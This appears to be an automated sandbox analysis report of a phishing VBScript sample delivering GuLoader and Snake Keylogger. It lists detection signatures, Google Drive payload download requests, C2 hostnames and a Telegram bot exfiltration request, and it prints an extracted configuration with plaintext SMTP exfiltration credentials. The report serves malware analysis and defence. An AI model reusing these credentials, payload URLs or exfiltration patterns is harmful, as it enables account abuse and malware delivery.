Windows Analysis Report
#U8a62#U50f9 (RFQ) -RFQ20241010.vbs

Overview

General Information

Sample name: #U8a62#U50f9 (RFQ) -RFQ20241010.vbs
renamed because original name is a hash value
Original sample name: (RFQ) -RFQ20241010.vbs
Analysis ID: 1530594
MD5: 1720cb49814844901b663405cb868b7d
SHA1: fcc41b466e5f919f302ab92bf5305b7ee3cce8b6
SHA256: 45395d14e4f88f3cdda6fef5f6c62c885faa538cf6c057fd4ac5de8ba876b706
Tags: vbsuser-abuse_ch
Infos:

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Snake Keylogger
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

AV Detection
barindex
Found malware configuration
Source: 00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "hardware@esteem.com.my", "Password": "PI%m)}2pZn6r", "Host": "mail.esteem.com.my", "Port": "587", "Version": "4.4"}
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.5% probability

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49978 version: TLS 1.0
Source: unknown HTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.7:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.7:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.7:49969 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.7:49974 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49995 version: TLS 1.2
Source: Binary string: ystem.Core.pdbFa source: powershell.exe, 00000006.00000002.1736763691.0000000008201000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 0043F45Dh 8_2_0043F2C0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 0043F45Dh 8_2_0043F4AC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 0043FC19h 8_2_0043F961
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265E0D0Dh 8_2_265E0B30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265E1697h 8_2_265E0B30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265E2C19h 8_2_265E2968
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265E31E0h 8_2_265E2DC8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265EE501h 8_2_265EE258
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265EE0A9h 8_2_265EDE00
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265EE959h 8_2_265EE6B0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265EF209h 8_2_265EEF60
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265EEDB1h 8_2_265EEB08
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265EF661h 8_2_265EF3B8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 8_2_265E0040
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265EFAB9h 8_2_265EF810
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265ED3A1h 8_2_265ED0F8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265ECF49h 8_2_265ECCA0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265ED7F9h 8_2_265ED550
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265E31E0h 8_2_265E310E
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265E31E0h 8_2_265E2DC2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then jmp 265EDC51h 8_2_265ED9A8

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108%0D%0ADate%20and%20Time:%2010/10/2024%20/%2022:08:16%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20980108%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49981 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49975 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49969 -> 142.250.186.142:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49982 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49990 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49986 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49980 -> 188.114.97.3:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1vmFR9yduH7B2lOFOQqcZVCVG4wctOCbI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1vmFR9yduH7B2lOFOQqcZVCVG4wctOCbI&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1ggBv_Uz1P3FSEVfHsKLEBxFe4KmO8Ixo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1ggBv_Uz1P3FSEVfHsKLEBxFe4KmO8Ixo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49978 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1vmFR9yduH7B2lOFOQqcZVCVG4wctOCbI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1vmFR9yduH7B2lOFOQqcZVCVG4wctOCbI&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1ggBv_Uz1P3FSEVfHsKLEBxFe4KmO8Ixo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1ggBv_Uz1P3FSEVfHsKLEBxFe4KmO8Ixo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108%0D%0ADate%20and%20Time:%2010/10/2024%20/%2022:08:16%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20980108%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: drive.google.com
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 10 Oct 2024 07:28:42 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: msiexec.exe, 00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: msiexec.exe, 00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: msiexec.exe, 00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: msiexec.exe, 00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: powershell.exe, 00000003.00000002.1556524743.000002673F9B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsU
Source: wscript.exe, 00000000.00000002.1342854505.0000020B00C1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310547788.0000020B00C02000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310864022.0000020B02A8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1290273681.0000020B00C34000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310965896.0000020B00C2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1341227470.0000020B00C13000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1341647462.0000020B00C1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310645852.0000020B02A8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1342094501.0000020B00BC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1342720790.0000020B00BC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1341227470.0000020B00B8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabTL
Source: wscript.exe, 00000000.00000003.1342094501.0000020B00BC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1342720790.0000020B00BC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1341227470.0000020B00B8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/eney
Source: wscript.exe, 00000000.00000003.1310547788.0000020B00C02000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310965896.0000020B00C2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?bb5a376bb8
Source: powershell.exe, 00000003.00000002.1514044704.0000026729147000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000003.00000002.1514044704.0000026729180000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000003.00000002.1549179646.0000026737431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1722477859.0000000005A48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.1715629069.0000000004B39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1514044704.00000267273C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1715629069.00000000049E1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: msiexec.exe, 00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000006.00000002.1715629069.0000000004B39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: wscript.exe, 00000000.00000003.1341647462.0000020B00C1E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1556524743.000002673F9B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000003.00000002.1556524743.000002673F9B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.cu
Source: powershell.exe, 00000003.00000002.1514044704.00000267273C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.1715629069.00000000049E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.1514044704.0000026727854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729169000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729147000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.000002672916D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: msiexec.exe, 00000008.00000002.2594642585.00000000239D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: powershell.exe, 00000006.00000002.1722477859.0000000005A48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.1722477859.0000000005A48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.1722477859.0000000005A48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.1514044704.0000026728820000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000003.00000002.1514044704.0000026728820000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.00000267275E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000003.00000002.1514044704.00000267275E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1vmFR9yduH7B2lOFOQqcZVCVG4wctOCbIP
Source: powershell.exe, 00000006.00000002.1715629069.0000000004B39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1vmFR9yduH7B2lOFOQqcZVCVG4wctOCbIXR
Source: powershell.exe, 00000003.00000002.1514044704.000002672916D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.googhZ
Source: powershell.exe, 00000003.00000002.1514044704.0000026727858000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.000002672916D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com
Source: msiexec.exe, 00000008.00000002.2578183119.00000000005EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/Z
Source: powershell.exe, 00000003.00000002.1514044704.0000026727858000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.000002672916D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1vmFR9yduH7B2lOFOQqcZVCVG4wctOCbI&export=download
Source: msiexec.exe, 00000008.00000002.2578183119.00000000005EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/n
Source: powershell.exe, 00000006.00000002.1715629069.0000000004B39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1514044704.0000026728820000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.1549179646.0000026737431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1722477859.0000000005A48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 00000008.00000002.2594642585.00000000238FE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 00000008.00000002.2594642585.00000000238FE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: msiexec.exe, 00000008.00000002.2594642585.00000000238FE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: powershell.exe, 00000003.00000002.1514044704.0000026727854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729169000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729147000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.000002672916D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000003.00000002.1514044704.0000026727854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729169000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729147000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.000002672916D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000003.00000002.1514044704.0000026727854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729169000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729147000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.000002672916D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000003.00000002.1514044704.0000026727854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729169000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729147000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.000002672916D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
